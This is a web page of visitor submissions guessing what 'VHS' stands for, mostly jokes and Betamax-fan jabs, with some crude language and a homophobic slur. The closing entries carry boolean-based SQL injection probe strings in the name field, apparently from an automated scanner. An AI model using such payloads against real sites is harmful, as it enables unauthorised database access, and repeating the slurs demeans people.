The common thought on this is that it stands for Video Home System, although many of you like to think otherwise so here is your chance to tell us what you think VHS Stands for. Please no obscenities though.


Alan , I think VHS stands for: Very Horrid System

Betaman , I think VHS stands for: Very High S***
danielgoyette , I think VHS stands for: very harrasing system
Martin , I think VHS stands for: Vile Hunk of S...
Martin , I think VHS stands for: Vertical Helical Scan
steved3604 @aol , I think VHS stands for: jvc named it video home system
Sven Svensson , I think VHS stands for: Viewing it makes a Human Scream , I think VHS stands for: VHS? vastly hyped system!
Robert grundulis , I think VHS stands for: Victorious Heap of S***
Alex , I think VHS stands for: Very Horrid System
Alex , I think VHS stands for: Very Hateful System
Marcus , I think VHS stands for: VERY HEAVY STENCH
Edwin Parsons , I think VHS stands for: Video Horrendous System
Kevs , I think VHS stands for: Vertically Harrassed Scientists
Martin Imber , I think VHS stands for: They say otherwise but it IS Vertical Helical Scan - all VCRs use Helical Scanning, Beta has a bigger drum
Rachael Nex , I think VHS stands for: Vaguely Humorous Specfications or Vapid Humdrum Sh*te
david etheridge , I think VHS stands for: very hard sell: if sony had done their sales pitch right, VHS would have gone the way of the Moskvich car (from Russia-and who remembers those apart from me?)
Ébsen , I think VHS stands for: Video Home System
Nick , I think VHS stands for: Very High SSSSSSSSSSSSSSound! After about 3 recordings, that HISS gets a ringing in my ear, whereas BETA RULES!!!
Martin , I think VHS stands for: Valueless Half-witted Scrap
Bjoern Esser , I think VHS stands for: Voll der High-Tech S*** (German, mean in English: Full of High-Tech S***)
John C , I think VHS stands for: Video Home System, Vertical Helical Scan and Very Horrible XXXXheap
Salvatore ... NYC , I think VHS stands for: Vanquish Human Sensibilities
Marc Dallas TX , I think VHS stands for: Victor company of japan Hates Sony
Mike B...DE , I think VHS stands for: Visually Handicapped System
Will , I think VHS stands for: Very High Hissssssss
a , I think VHS stands for: Vhs machine are a bit of junk they should start making the good old beta's again long live beta
Nick , I think VHS stands for: jVc Hates Sony , I think VHS stands for: Very horrible subsony
Jean , I think VHS stands for: VHS goes well with NTSC Never Twice the Same Color
beta , I think VHS stands for: vhs sux!!!
betamax , I think VHS stands for: a hunk of s*** that does not work!!! long live beta
Dylan Lewis , I think VHS stands for: VHS stands for very hopless system(or very hopless s***)
Dillon Lewis , I think VHS stands for: VHS stands for Very Hissy Sound
Mark Alexander , I think VHS stands for: Very Honky Stinky
Ruud ten Heggeler , I think VHS stands for: Verschrikkelijk Hopeloos Systeem (Very Hopeless System) or maybe Victor's Horrible Standard (J.Victor Company....)
Yau-ming , I think VHS stands for: Virtual Hunk of Shlock
Seb Sekinger , I think VHS stands for: V.H.S.- "Visual Horror Show !"
AROS Staff , I think VHS stands for: Very Horrifieng Stuff or Victor Hates Syncabilty or Video Home Scare,
A.L.J.Spek , I think VHS stands for: Visious Hatefull Sony
m , I think VHS stands for: the new junk that breaks down every 3 years as beta keeps on going
Betacam SP , I think VHS stands for: Vegtible Homing Source.
An absence of nomenclature , I think VHS stands for: Vionlins Have Strings (the secret's out now!!!)
DPM , I think VHS stands for: VHS means Viewing Hunderd Screenlines
Randall , I think VHS stands for: VHS= Video Home System...and thats the truth!
Ruudje B , I think VHS stands for: Omroep Hilversum, zegt meer dan genoeg
Canon XL-1 , I think VHS stands for: DV should be a Homeformat!
AndyMan Aka. Andrew Benham , I think VHS stands for: V=Very, H=Harrasing S=S***
DV , I think VHS stands for: Very much Hated System. Digital Betacam rules indeed. So when does digital Beta come out then?
ALEXANDER , I think VHS stands for: I think VHS might stand for Very High Standard. (Betamax is better though and is more environmentally friendly as less plastic is needed for the cassettes shells)
Bill , I think VHS stands for: Very Horrible (unless)S. S-VHS is really rather good - which is probably why it's almost as rare as BETA.
AndyMan , I think VHS stands for: Very Hateful to Sony, because they don't belive in our beloved format!!
Josh Inifer , I think VHS stands for: Depending on the machine, VERY HARD to SERVICE, VERY HISSY SOUND, or VERY HOPELESS STANDARD...
rob suttner , I think VHS stands for: i think it stands for VERY HYPERSTUPID S*** SYSTEM
"Spiney Norman" , I think VHS stands for: VeHoS the angry vengeful god of crappy consumer electronics. as in "Kneal down before Vehos! Or I shall render your video collection obsolete!"
Triumph (Yugoslavian Mountain Hound) , I think VHS stands for: one of the finest home video systems in history. . . FOR ME TO POOP ON!
backlash , I think VHS stands for: I agree that vhs means "Video Home System" but with the advent of DVD does vhs or beta really matter anymore?
Ikegami HL-V97W-DVCPRO-HD , I think VHS stands for: Vaginal Humitidy Sensor, Vertical a Hundred Screenlines, Vrije Hilversumse Sluimernichten (Lose Hilversum creep-faggots). Vendored by Homo Sexuals. Video Homo Sexual, Venus Hill System, Video for Homeless Sucky sucky girls.
Emil Jensen , I think VHS stands for: Video Home System
Mean18 , I think VHS stands for: Very Hateful to Servicers!
123-beta4me , I think VHS stands for: Vapid Horrendous System
S-Dog , I think VHS stands for: Millions upon millions of dollars in profit for Very little performance or quality in return...Long live the Mighty U-matic!!
Michael Lam , I think VHS stands for: Very High Scum
B H Studios , I think VHS stands for: I think VHS stands for Vile Heap of S*** and SVHS standr for Sincerely a Vile Heap of S***. £500 for a machine that fucks up after 2 years is a rip off. Super Beta wasn't that bad. I haven't tried Digital Beta. That didn't really hit the UK market.
Dan , I think VHS stands for: video home system, i read that somewhere. yes beta is better, but vhs is good for your every day stuff where you dont care about quality.
dicka , I think VHS stands for: vastly high and superior
, I think VHS stands for: victorious hating scumbags (that's jvc, by the way)
Dave , I think VHS stands for: Very Horrid video S***
Pete , I think VHS stands for: victorious hating scumbags (that's jvc, by the way)
kook , I think VHS stands for: you guys are freaks
ted , I think VHS stands for: vuck hoff ya fugging sitheads!
shaun , I think VHS stands for: Vital Hating Speechs
pete , I think VHS stands for: jVc + sony Have become allieS
Willis , I think VHS stands for: VICIOUS HOME STIRING VOMIT!
Fugg , I think VHS stands for: VHS:= Victorious Home System BETA:= Better Ethological Taping Agency
dave , I think VHS stands for: vhs:= Very Hateful video Sucking bastards! beta:= BEtter Than all the other usual crAp!
NICK , I think VHS stands for: video home system. there, are you happy now?
barry , I think VHS stands for: vivivivivivivivivivivivivivivivivivivivivideo home system! sorry, i'm not good at saying that word!
rick , I think VHS stands for: VHS? VIDEO HOME SYSTEM? whats that? as far as i'm concerned, vhs doesn't exist in this world. it is mearly a more powerful copy of betamax, thats what i think. vhs doesn't exist, it wasn't even invented. betamax came first. betamax is supreme. betamax is king to all. whilst vhs is the pauper. vhs is dead. IS THAT OK WITH YOU?
JOSH , I think VHS stands for: vhs is an illusion. it never existed! it is a fake! it's not real! it wasn't ever supposed to be invented!we shouldn't be living in a world with vhs! why did it have to be like this? anyway it stands for video home s***. ok?
Trevor , I think VHS stands for: VHS Video Home System BETAMAX BEtter Than All Maggets And guys with hugh siXpacks NTSC Not really The Same Colour is it? BETACAM BEtter ThAn Cunts And Muggers
Roger , I think VHS stands for: Virtual Hating Semen
William , I think VHS stands for: Vucking Horse Sitt
Ian , I think VHS stands for: VHS:Very Hateful Series BETAMAX:Better Ever Than VHS ever wAs + Maximum Administration Xinc. U-MATIC: U-MATIC V2000: VIDEO 2000 [Duuuhhhhhhhhhhh!] BETACAM : same as BETAMAX except Commisional Adminisitartion Maggits.
Adrian , I think VHS stands for: Virus Hitting System
Tak Ki , I think VHS stands for: Virtual Homosexual Service
Tak Ki again , I think VHS stands for: Verified Homicide Scenes
Colin McCormick , I think VHS stands for: Officially it is "Video Home System" but was originally "Video by Helical Scan", which was dropped because Beta also uses Helical Scan. I call it Very Horrible System.
betacatania , I think VHS stands for: Video of the Highest S***.
Gerbrand , I think VHS stands for: Vervloekt Hoogstaand Stuk rommel! (Damned Hightec Piece of s***!)
robert w. , I think VHS stands for: vertical helical scan.
Jon , I think VHS stands for: VHS will be taken over by DVD recorders. I predict that within 10 years VHS WILL BE OBSOLETE & DOWN THE SKIP cos nobody went from colour to b&w so nobody will go from DVD to s*** VHS. VHS IS TO DIE.
Lewis Kee , I think VHS stands for: I would like to think that VHS stood for: Thanks to Thorn EMI electronics in the UK, Thanks also to Radio Rentals & Rumbelows (RIP the '90's) for their part in destroying beta in the UK leaving us fifteen years in the future with a £80 "trade" VCR with picture quality of the equivalant of watching a badly tuned TV through a pair of beige tights.
TheBetaMan , I think VHS stands for: video Home System
Alex , I think VHS stands for: VHS= very s***ty format that never works when you want it to always grany picture with new tapes when Beta tapes can run for almost 30 years Long Live Beta
Trey , I think VHS stands for: Video Horror System - DVD rules all of them!
dude , I think VHS stands for: Very High Standards - the damn things are almost identical in every way with each other! Very horrid S%#@ goes well too, and so does Vent of Hell's Steam.
Bumpy , I think VHS stands for: Video Humper Stumper
Falconi , I think VHS stands for: VIRGIN'S HOLE SWEAT
Doktor Faustus- , I think VHS stands for: Video Hijinks Static... Vicious Hyena Scanner... Vindictive Heinous Scam...Venous Hypodermic SOMA
Robbie , I think VHS stands for: Very Highpriced S***
Robbie , I think VHS stands for: Virtual Horse S***
JASON , I think VHS stands for: Come on folks, if you stop buying s***ty cheap machines and spend more than £120.00 on a VHS machine you won't have to slag the system off. Beta is long gone and dead. Maybe your tellys are crap, ever thought of that? i love my Panny S-VHS deck. So there.
robo471 , I think VHS stands for: very high stand = take 4 vhs tapes one for each corner foot of a betamax vcr good to keep it up out of the floor hi
Daiv , I think VHS stands for: Victualizing Human Senses
, I think VHS stands for:
barry , I think VHS stands for: Vastly, Highly Super (to beta)
mark , I think VHS stands for: Vary horny sheep
bob guy , I think VHS stands for: virtual harrasment systems
bob , I think VHS stands for: Vertical Helical Scan *OR* Visual Harassment System
Al Gore , I think VHS stands for: I invented VHS. And the internet
bob , I think VHS stands for: Virtual Hog Slop
bob , I think VHS stands for: someday I will rule the world
David Palmer , I think VHS stands for: Who cares, fact is it won that war!
Olive Thomas , I think VHS stands for: [V]ideo that 's H]ighly [S]uspect... or [S]ubstandard ...
Olive Thomas , I think VHS stands for: [V]ideo that 's [H]orribly [S]ubstandard...
Luiz - Rio de Janeiro - Brazil , I think VHS stands for: For me it stands for Video Home Scrap... But whichever the true meaning of these letters is, I'm sure it comes from some obscure Japanese dialect that means : -- WE GIVE UP, WE CAN'T THINK OF ANYTHING BETTER THAN THIS CRAP, or maybe: -- WE WISH WE WORKED FOR SONY, or: -- WE DESIGNED THIS ON OUR ETCH-A-SKETCH... My guess is that the engineers from JVC did all kinds of drugs while attending college and now we have to put up with their s***. Thank God for DVD... BETAMAX STILL RULES!!! SL-500MD FOREVER!!!
Lundberg , I think VHS stands for: Video Home System !!!!
Edward The 4th , I think VHS stands for: V= the high VELOCITY it's thrown out the window with. H=JVC's 'HOES' that bought it S=STUPID people that believed JVC when they said it was better
Matthew , I think VHS stands for: it stands for Visually hopeless system
Matthew , I think VHS stands for: Visually hopeless system JVC = Junk Vulnerable Crappy
Luke , I think VHS stands for: Very High Standard.....My Ass!!!!!!!
TEK , I think VHS stands for: Very Hated System (by judging these other messages!)
TEK , I think VHS stands for: Very Horrific Shambles
TEK , I think VHS stands for: Vicous Horrid Screen
TEK , I think VHS stands for: Visually Hyperlow Standards.. Umatic rules.. Isn't 'Betta is Better' an obuiously stark obvious sales saying? This Better lark is old...
TEK , I think VHS stands for: Visually Horrendus Scum
TEK , I think VHS stands for: Very Handy (for the) Scrapman
TEK , I think VHS stands for: Very Honoured Scrap
TEK , I think VHS stands for: Very Handy Swearing opportunity / Very Heavily Sweared at item
TEK , I think VHS stands for: Very Handicapped Stink
Bernard Shifman , I think VHS stands for: Vigorous Heterosexual Sex
Mauk , I think VHS stands for: Very Highly S***ty
Mark Boulton , I think VHS stands for: Vertical and Horizontal Smudging
Mark , I think VHS stands for: less details, less colours, noisy linear sound, HiFi drops, damn it
Kenny , I think VHS stands for: Very Horny Stud
betahater , I think VHS stands for: ive got to much time on my nerdy hands and im going to talk about a machine that hasnt been made in 15 years vhs rules
Franny Wentzel , I think VHS stands for: Verächtlich Hündin Scheisse Here at the MFI we still use SL-F1s for lab image captures. Best deck for the job...
Jeff Rourk , I think VHS stands for: Venerial Hump Syndrome
Vinnie the Pooh , I think VHS stands for: Viciously Horrible Scam perpetrated by the Vile Hordes of Satan
Mick_AKA , I think VHS stands for: Very Horrible to Service, gimme a beta to work on anyday.
Justin , I think VHS stands for: Very High Standards
Monika & Erika Mankewitz , I think VHS stands for: The lowering of consumer expectations. The abandonment of quality standards. The 'Dr. Evil' of video systems. The Windows 3.1 of video systems...
Fred , I think VHS stands for: It stands for video home system. And BFGL stands for "Betamax fans, get a life". I suppose you mourn the death of Super 8 home moves, and 8 track car stereos as well? The market makes the final decision, and it chose VHS not Betamax. Dry your eyes and get over it.
Olive Thomas , I think VHS stands for: 'the other white meat' in Japanese...
don Leo , I think VHS stands for: VHS stands for the idea that Video 2000 is the best system but it you want to watch porno you'd want some japanese piece of crop with the VHS logo on it
Lenny , I think VHS stands for: JVC deciding to be difficult. In all fairness, VHS isnt horrible, but no doubt Beta is technologically superior. Problem being, it went out of fashion before the technology got super reliable like it is now... Grrrr, JVC...
His Master's Voice , I think VHS stands for: Video Home System. Period. That's the only truth. Anyway, the best home video format was Philips/Grundig Video 2000. From the very early machine it featured perfect clear still and auto tracking. Even more advanced models had an exclusive motor for each reel making the transport response ultra quick. Problem: it was made in Europe and was extremely massive. However I still own my first Philips VCR and it works fine. My second VCR was an early SABA (OEM JVC) top loader with the tungsten lamp for the tape end sensor. The only thing I have had to change to this machine is the capstan motor belt (twice). It still works fine and have a very good picture quality. Even the color and the edges of the picture are better in this one than in other newer models.
His Master's Voice , I think VHS stands for: I've just remembered that when Sony decided to produce VHS machines they advertised them in Spain as "Videos Hechos por Sony", in English "Vcr's made by Sony". And don't forget that the converted colour carrier, the actual core of home video technologies, and of course Betamax, was developed by JVC. Tardismon
Tardismon , I think VHS stands for: Virtual Hell System
Tardismon , I think VHS stands for: Visionary Heap of S***
Tardismon , I think VHS stands for: Very Hard to use S***
Tardismon , I think VHS stands for: Very Hateful S***
Tardismon , I think VHS stands for: Very temperamental Hunk of S***
Tardismon , I think VHS stands for: Vast Hunk of S***e
Tardismon , I think VHS stands for: Verified it's a Hole load of S***
Tardismon , I think VHS stands for: Very Horrifying S***
Tardismon , I think VHS stands for: Very Horrid and Slow.
Tardismon , I think VHS stands for: Very High-tech pooper Scooper
Somebody , I think VHS stands for: Visionary system for Homeless GirlS
Gimble , I think VHS stands for: Vain, Hopeless, Stupid
Eduard Elskamp , I think VHS stands for: i think VHS is better íts looks like a 2 window shell TDK betamax cassette but then bigger
Madge Mikels , I think VHS stands for: Vehicle for Horrifying Squeaks
The new Number Two , I think VHS stands for: The V-illage and H-ome S-urveilance programme. By hook or by crook we will get your betas!
anonymous , I think VHS stands for: Very High SSSSSSSSSSSSSssssssss......
Andrew Batstone , I think VHS stands for: a Vapid, Humdrum Standpoint. Thanks JVC (Junk Video Corporation).
J. Michael Reiter , I think VHS stands for: VHS stands for VILE HEAP of S***.
J. Michael Reiter , I think VHS stands for: VHS stands for VILE, HORRID S***.
Abdalla , I think VHS stands for: video home system
tony the tech , I think VHS stands for: designed by jvc it stands for video home systems, however, i prefer the amusing alternatives
Richard Gere , I think VHS stands for: Voles, Hamsters and Shrews and various other rodents inserted in JVC's colon...
D.B , I think VHS stands for: VHS= Video High Schit
Mike R , I think VHS stands for: Very High $(dollars)
Dave , I think VHS stands for: have you come to a conclusion yet about the real meaning is it VIDEO HOME SYSTEM or is it VERTICAL HELICAL SCAN come on boffins put us out of our misery
Harry , I think VHS stands for: video home system doesn't sound right... it would make more sense as "home video system" in which case it would be hvs
DVD , I think VHS stands for: The system that was more popular than Betamax. . . GET OVER IT!
Dee , I think VHS stands for: Very Hujowy System
Moshe , I think VHS stands for: Very Humming Sound
Davidc , I think VHS stands for: Very Heavy S***, well, my VHS recorder is.
daniel collins , I think VHS stands for: Valueless Heap of S*** !
Sony beta , I think VHS stands for: very high standard
Keko , I think VHS stands for: I think vhs stand for: vuris-harassment-sulltanaga....
super 950 nutter , I think VHS stands for: VERITIBLE HEAP of SCRAP
davie blunkett , I think VHS stands for: VERY HIGH STUNNING picture
vdv , I think VHS stands for: the system that was not as good as betamax...GET OVER IT!
ED BETA , I think VHS stands for: Very Hyped System
SSGX , I think VHS stands for: Not sure how old this site is, or how long ago anyone visited this little list, but I stumbled across it in a genuine search for the meaning of the VHS acronym... I'm struck with only one thought: you guys must not be from the United States, and I'm not saying that based on the Dutch entries (that is Dutch, right?)... I'm now 23 years old, born in 1980... And in my lifetime, all I've ever known is VHS... I'm familiar with Beta only through I find it odd to read some of you talking about VHS as something that is replacing Beta, when in this country, it already has replaced it, and it happened long before this site Interesting cultural differences there...
mj.jernigan , I think VHS stands for: the Voice-majority Hinders Sensibility
mj.jernigan , I think VHS stands for: Viewer Hatred System
Nikki C. , I think VHS stands for: Vomitous Head Shredder
Nikki C. , I think VHS stands for: Video Horribly Synced
Nikki C. , I think VHS stands for: Vertically Handicapped Scanning
Dan , I think VHS stands for: video home system
Gerard , I think VHS stands for: Video Home System
Peter , I think VHS stands for: Victorious Herpes Sufferors
mike , I think VHS stands for: why are you people wasting your time with this. its not veta for god sakes
chris , I think VHS stands for: very highly rater pile of scrap
chris , I think VHS stands for: very hateful video system
chris , I think VHS stands for: very highly rated pile of scrap
chris , I think VHS stands for: vile horrid system what on earth were jvc thinking long live BETAMAX!
david blunkett , I think VHS stands for: god knows i cant see!
HP , I think VHS stands for: Stands simply for Video Home System. Much more brilliiant than Beta
father ted , I think VHS stands for: very horibble video system
chris , I think VHS stands for: video head spin (FOR 5 MINUTES AFTER THE TAPE HAS HALTED WEARING OUT ITS OWN HEADS!) Beta rules!
Jazzy B , I think VHS stands for: Video Hell System
benja (españa) , I think VHS stands for: vhs es una pinche mierda ¡que viva por siempre betamax ! ni dvd ni vhs solamente BETA SL-660
david blunket , I think VHS stands for: very wonderful picture system!
ted , I think VHS stands for: teleVision by Hopelessly poor quality scan
david blunket , I think VHS stands for: Very wonderful High quality picture System!
Doug , I think VHS stands for: Vestigial Helical Scan
Pinocchio , I think VHS stands for: Video Has to Suck
Kyle , I think VHS stands for: Very Hot Sexiness
J Trutin , I think VHS stands for: Very Historic Stuff
Joshua Martin , I think VHS stands for: Viewers Horrer Show! I think Betamax's should be made again, and with a reasonable price, I think it would win Video War 2!
Stefanie , I think VHS stands for: Violation Hand Sign
Mafu, England , I think VHS stands for: Vampiric Hillbilly Squirrels
Brick , I think VHS stands for: Vomit (what the viewer does upon one glance of the picture quality). Hideous (the picture quality and the sound itself). Shocking (why this piece of crap beat out Beta in the format wars).
Beta is dead (hurrah!!!) , I think VHS stands for: VHS stands for? Victor (company of Japan) Hated (Sony) and kicked the S*** out of Sony. As for Sony making better products? What a piece of sh*t the graystation poo is - absolute crap. The game cube is better than that dross (even the Saturn was better than PS 1). Finally I would like to say SONY SUCKS (BIG TIME) and congratulations on JVC costing them ZILLIONS of lost licensing over the years - I TAKE MY HATS OFF TO THEM. Now it's time for DVD to take over (incidentally a system that blows ALL tape formats out of the water - I thank you:) xxx
:( stupey head , I think VHS stands for: please tell me for real what it stands for i need it for my homework
Reply For Stupey Head , I think VHS stands for: It stands for: VERTICAL HELICAL SCAN, but some people say it's VIDEO HEAD SYSTEM.
Milf , I think VHS stands for: it stands for Vigerous Honky Standards
ted , I think VHS stands for: teleVision by Horrid quality Scan
Nadav , I think VHS stands for: Video Home System
Glen , I think VHS stands for: Video Housing System
DEANO , I think VHS stands for: Vertical Horizontal Scanning
misty , I think VHS stands for: video hydrolics system
Adelyn , I think VHS stands for: Very Homosexual Stranger
misty , I think VHS stands for: vintage household snake
Misty , I think VHS stands for: Visual hamster skate
Cholie , I think VHS stands for: Vital homemade storage
Shelby , I think VHS stands for: voldemort's hott spouse
Cholie , I think VHS stands for: Vital homemade storage
Clive Bunker , I think VHS stands for: Video Home System
Clive Bunker , I think VHS stands for: Vile Horrible Stinks
JIM , I think VHS stands for: VIDEO HOME SERVICE
Trevor , I think VHS stands for: VHS was originally invented by the Japanese Victor Company (JVC) and is the name given to the method of recording video information onto tape. VHS stands for Vertical Helical Scan
julian Raphael , I think VHS stands for: Vegetive Humanoid State
fxxyldy , I think VHS stands for: video housing system
Sonny , I think VHS stands for: VHS stands for Video Home System (originally Vertical Helical Scan), and is a recording and playing standard for video cassette recorders that was developed by JVC in 1976, and became the dominant standard in the 1980's after competing with Sony's Betamax. A VHS-cassette contains a 1/2 inch magnetic tape wound from one of two spools to the other, allowing it to pass over the reader head of the video cassette recorder. VHS tapes have an approximately 3 MHz horizontal resolution and 250 lines of vertical resolution.
Melissa , I think VHS stands for: Video Home System
Mark Rosenthal , I think VHS stands for: Video Head System
The Correct Answer is , I think VHS stands for: Vertical Helix Scan
Harjeet , I think VHS stands for: Video Homing System
dhla , I think VHS stands for: Very Humble Screener
Lance , I think VHS stands for: Videos Horrendous Setback
Ron , I think VHS stands for: video head system
Bob Hope , I think VHS stands for: Very High Stuff
Jamie , I think VHS stands for: I think it stands for Video Home System, duh!
Alex , I think VHS stands for: video home system
Mariah , I think VHS stands for: video home system
Trebek , I think VHS stands for: You guys are all crazy and obscene... it stands for Video Home System... weird people that visit this page... go swearing up a storm about some piece of electronic equipment... IF YOU DON'T LIKE IT, LEAVE IT ALONE!!!
Tom Gould , I think VHS stands for: visiting harrys sanctuary (his hutch)
Greg Goodall , I think VHS stands for: very hard stick...
Jodi Porcinno , I think VHS stands for: virtual ham sandwich
Micheal Ball , I think VHS stands for: i think thomas the tank engine is the best!!!!
Greg Goodall , I think VHS stands for: nah aa girlfriend, ivor the engine
Dan U , I think VHS stands for: Tom gould has no eyes and eats noodles when he cries and cant beat me up
sakib rayman , I think VHS stands for: hey guys calm down guys, it stands for voodoo has socks
marjorie stewart-baxter , I think VHS stands for: vocal happy slaps
stuart , I think VHS stands for: video by helical scan
Jon , I think VHS stands for: It stands for Vertical Helical Scan. Video Home System was the dumbed down translation, kinda like DVD stands for Digital Video Disc, but has since been changed to Digital Versital Disc, since it does more than just video...
beau , I think VHS stands for: variable helical scan
Betamax C20owner , I think VHS stands for: It´s a kind of good feeling you get when you have just seen a JVC-invented video recorder been runned over by a freight train...
El Diego ( , I think VHS stands for: Talking about Very Homosexual System; Vaginal Humidity Sensor and things of the like ... is it true that Betamax failed becouse some directors at Sony did not wanted Betamax to distribute porn movies? ;) Diego
Kirchoff , I think VHS stands for: Vertical Helical Scan
Tim Rocker , I think VHS stands for: Various Hairy Somalians
Spencie , I think VHS stands for: Very Hot Sluts
BOB , I think VHS stands for: VIDEO HOME SYSTEM. jvc did not name it vhs. it was RCA because theyve been around far longer. what the hell is wrong with you people. vhs is the stuff!! here it is november 2, 2005 and i will never get rid of my vcrs. you people are idiots. i love vhs, so neat. i love the classics. beta, never seen it. but ive seen pics. so neat. all this new stuff pisses me off. dvd and cd get scratched.. theyre screwed. but vhs will live on. it will not die as long as people like myself have faith in it.forget dvd. im not impressed.
hiri kiri rock , I think VHS stands for: most of you have no idea whast you are talking about. vertical helical scan.... no you idiots. helical scanning is a feature incorporated in the video system. it stands for video home system
josh , I think VHS stands for: vaccuming homelessman's shrubbery.
josh! , I think VHS stands for: vivid hampster sex
samantha , I think VHS stands for: victoria has syphillis
josh! , I think VHS stands for: vommitting happily machine
josh! , I think VHS stands for: very horny muppet-midgets
, I think VHS stands for: Very Helpful Sony-killer
Chris1986 , I think VHS stands for: VHS wird noch die DVD und deren Nachfolger überleben! VHS ROCKS!!!!!!!!!!!!!!!
ollie , I think VHS stands for: im missing out cause vhs is all i got. eh im over it
Joe M , I think VHS stands for: V H S Stands for Vulgar Hellish S**te
B H Betamax , I think VHS stands for: Virtually Hated Stigma, that's a polite way of saying what I think. Betamax still sells, but how much do VHS sell for these days?? Who Rules the market now????
Mike Webster (Hills Waste) , I think VHS stands for: very horny system
lee robinson , I think VHS stands for: vertical helicoil scan
lee robinson , I think VHS stands for: vertical helical scan,oops
Michael A. , I think VHS stands for: Video Head Scraping- Eats and Wears out Tapes!
vidieo handely sytem , I think VHS stands for:
Dr. Anup , I think VHS stands for: Vertical helical scanning
digs , I think VHS stands for: very horrifieng stuff
Craig Felsmann , I think VHS stands for: VHS stands for: Cr** quality!
jonathan , I think VHS stands for: video happy sasiatey
, I think VHS stands for: vertical helical system
chinny , I think VHS stands for: vermin hairy scotland
peter crouch , I think VHS stands for: vertical helical scan
James Dylan , I think VHS stands for: Oh my god I can't see the film.. I'm off to rent a dvd..
Dr Yakamoto, vhs, sux, vet, Md. , I think VHS stands for: Venerial Horse Syphillus
Chong , I think VHS stands for: Very Heavy S***, man!...
me , I think VHS stands for: better than beta
me , I think VHS stands for: better than beta
Tim Brooks , I think VHS stands for: Vastly Horrible Sound
dklxhfihsdio , I think VHS stands for: verry heavy s***
Matthew , I think VHS stands for: Sometimes it can be : Very high standard but only on pre recorded movie tapes from 1996 and above and widescreen versions or NTSC tapes (my toshiba VW-80 8 head VHS machine was amazing) It should have been called VHSS Visually horrid Shitty Sound
'''''''''''''' , I think VHS stands for: why is it not hvs Home Video System ???
Matt , I think VHS stands for: Video Head System
jonathan beswick , I think VHS stands for: video home sevis
David , I think VHS stands for: Veering towards a Hammering with a Sledgehammer!!! I want my SL-F1UB!!! (arriving soon!!!)
Danny , I think VHS stands for: Vertical Helical Scanning
Gary , I think VHS stands for: Proof that market forces dont deliver the best. and Vampires Have Sucked!
Mark , I think VHS stands for: Vigurously Hyperactive Sex
garymax , I think VHS stands for: Victorious! Ha-Ha Sony
R1 , I think VHS stands for: Video Home Standard
A/V LARRY , I think VHS stands for: I changed my occupation to that of repairing/maintaing videocassette-recorders(although I don't do much of them today-just everything else!), back in 1981. Initally, they were all betas, but when the two systems were briefly "concurrent", I thought VHS stood for Volksvideo's Happy Stuff, i.e., as with "Volkswagen", a format for the "people", "masses", "common folk",whatever, that were too cheapskate to afford the real thing! ,
john the bassist , I think VHS stands for: very heavy sounds!!
ralfraz gobonaphar , I think VHS stands for: venutian heiroglyphic stories
andries , I think VHS stands for: video high system
Cranston , I think VHS stands for: Video Home System. The idea that Beta was superior is a myth:
TAHIR , I think VHS stands for: VHS
TAHIR , I think VHS stands for: DVD
Steven , I think VHS stands for: VERY HIGHEST-QUALITY SUPERIORTY over the pathetic beta
Nick Blackburn , I think VHS stands for: Vomitsome Horrible System
Rudy Ramirez , I think VHS stands for: video head system
christu , I think VHS stands for: V.H.S. in latin ( videous horus shitem) which, when translated roughly means what a pile of shite. i think that this sums up vhs fairly.
Allison , I think VHS stands for: vertical helical scan
David Mulbjerg , I think VHS stands for: Vertical Helix system
Willie Bruwer , I think VHS stands for: Video Home System
Jon , I think VHS stands for: Variable Head Scan
Lauren , I think VHS stands for: Virginia high school
Susan McCann , I think VHS stands for: Video Higher than Satan
Jack , I think VHS stands for: veronica's huge shoe
lak , I think VHS stands for: video home system
Kate Nelson , I think VHS stands for: Video HAAAAaaahhh
Kate Nelson , I think VHS stands for: Video HAAAAaaahhh
JAnditsME , I think VHS stands for: Video Has Sound
Lucinda , I think VHS stands for: Vertical Helical Scan
dieter , I think VHS stands for: VAGINAL HUMAN SACRIFICE
skeeter , I think VHS stands for: VOLUMOUS HEAPS OF STEROIDS
michael eng , I think VHS stands for: VIOLENT HATEFUL SEX
farah lynch , I think VHS stands for: vulgar humping sasquatch
JPM , I think VHS stands for: Victorious Hunk of Sh!t
Michael , I think VHS stands for: Video Home System
Michael , I think VHS stands for: Penis land vagina
Mario , I think VHS stands for: Video Hits Show
Shane Christensen , I think VHS stands for: Vertical Helix Scan
tarik mohamed islam iqbul , I think VHS stands for: a crap system.
bigandya , I think VHS stands for: I think it stands for Video Have Sex
Metro , I think VHS stands for: Saw in head on Rank.
, I think VHS stands for: vertical helical scan
BBC600 , I think VHS stands for: Video Head System
Ebbe , I think VHS stands for: Good for Thomas The Tank Engine collectors. All th classi epsodes is on vhs!
panasonic , I think VHS stands for:
[Anonymous] , I think VHS stands for: Video Homer Simpson
sony , I think VHS stands for: slv-xc30
TGSOT - The Grand Scheme of Things , I think VHS stands for: Very Hellish System
TGSOT - The Grand Scheme of Things , I think VHS stands for: Video Home System(I'M NOT SORRY)
Zac , I think VHS stands for: Video Home System
Richard , I think VHS stands for: Very Horrible System
Blake W. , I think VHS stands for: Very Home Some
Sammy , I think VHS stands for: Valley House Seal
Tom , I think VHS stands for: Virtually Hidden Sytem
Dave , I think VHS stands for: Vertical Helical Scan
Hilmare , I think VHS stands for: Video Hakaniemi Satellite
Hilmare , I think VHS stands for: Video Hakaniemi Satellite
fnfOzvSR , I think VHS stands for: 555
fnfOzvSR , I think VHS stands for: 555
fnfOzvSR , I think VHS stands for: 555
fnfOzvSR , I think VHS stands for: 555
fnfOzvSR , I think VHS stands for: 555
-1 OR 2+538-538-1=0+0+0+1 -- , I think VHS stands for: 555
-1 OR 3+538-538-1=0+0+0+1 -- , I think VHS stands for: 555
-1 OR 3*2<(0+5+538-538) -- , I think VHS stands for: 555
-1 OR 3*2>(0+5+538-538) -- , I think VHS stands for: 555
-1 OR 2+577-577-1=0+0+0+1 , I think VHS stands for: 555
-1 OR 3+577-577-1=0+0+0+1 , I think VHS stands for: 555
-1 OR 3*2<(0+5+577-577) , I think VHS stands for: 555
-1 OR 3*2>(0+5+577-577) , I think VHS stands for: 555
-1' OR 2+100-100-1=0+0+0+1 -- , I think VHS stands for: 555
-1' OR 3+100-100-1=0+0+0+1 -- , I think VHS stands for: 555
-1' OR 3*2<(0+5+100-100) -- , I think VHS stands for: 555
-1' OR 3*2>(0+5+100-100) -- , I think VHS stands for: 555
-1' OR 2+625-625-1=0+0+0+1 or '8VhYmKdP'=' , I think VHS stands for: 555
-1' OR 3+625-625-1=0+0+0+1 or '8VhYmKdP'=' , I think VHS stands for: 555
-1' OR 3*2<(0+5+625-625) or '8VhYmKdP'=' , I think VHS stands for: 555
